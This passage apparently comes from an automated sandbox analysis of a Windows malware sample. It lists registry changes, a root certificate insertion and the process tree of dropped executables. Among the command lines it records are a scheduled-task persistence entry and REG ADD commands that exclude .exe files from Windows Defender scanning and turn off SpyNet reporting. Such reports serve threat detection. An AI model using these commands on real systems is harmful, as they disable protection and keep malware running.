| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-222 = "Alaskan Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" | C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe
"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe
"C:\Users\Admin\Pictures\YTL0PmmS83SCp78qfDgfizjt.exe"
C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe
"C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe"
C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe
"C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe"
C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe
"C:\Users\Admin\Pictures\MQRy5a2TwXi0WZTzeI0qoVpB.exe"
C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe
"C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe"
C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe
"C:\Users\Admin\Pictures\D5DiMuAoMYdqs3uIyHVh2vxp.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3156 -ip 3156
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 864
C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe"
C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe
"C:\Users\Admin\AppData\Local\Temp\u2zg.1.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3868 -ip 3868
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 1172
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --silent --allusers=0
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3208 -ip 3208
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e82e1a8,0x6e82e1b4,0x6e82e1c0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 532
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\b04vaIYl7t9GKnLT4gGKsr1W.exe" --version
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
"C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3460 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142125" --session-guid=77820e10-ad15-4e06-bd77-7e7f60bb5f81 --server-tracking-blob=YmViMGExMDNhN2QzMDlmMGFkNDI4OWU5ZWQ3M2UzOTA3ZDVjN2Y5YmU4YTFiOTFmMjg4MGViNDViYTk1N2YwYzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMSIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzU2NzkuNTQ4MCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjM5MmMwYWFkLTYxNTgtNGE5ZS1hY2IzLTM4ZGRjNmJjZTFiYyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C04000000000000
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3208 -ip 3208
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe
C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2b0,0x2c0,0x2c4,0x28c,0x2c8,0x6deae1a8,0x6deae1b4,0x6deae1c0
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 528
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3752 -ip 3752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3752 -s 1164
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe
"C:\Users\Admin\Pictures\oGKQq6EzTV5MSsy1lks4vpiG.exe"
C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe
"C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe"
C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe
.\Install.exe /YnGgdidyhQpz "385118" /S
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
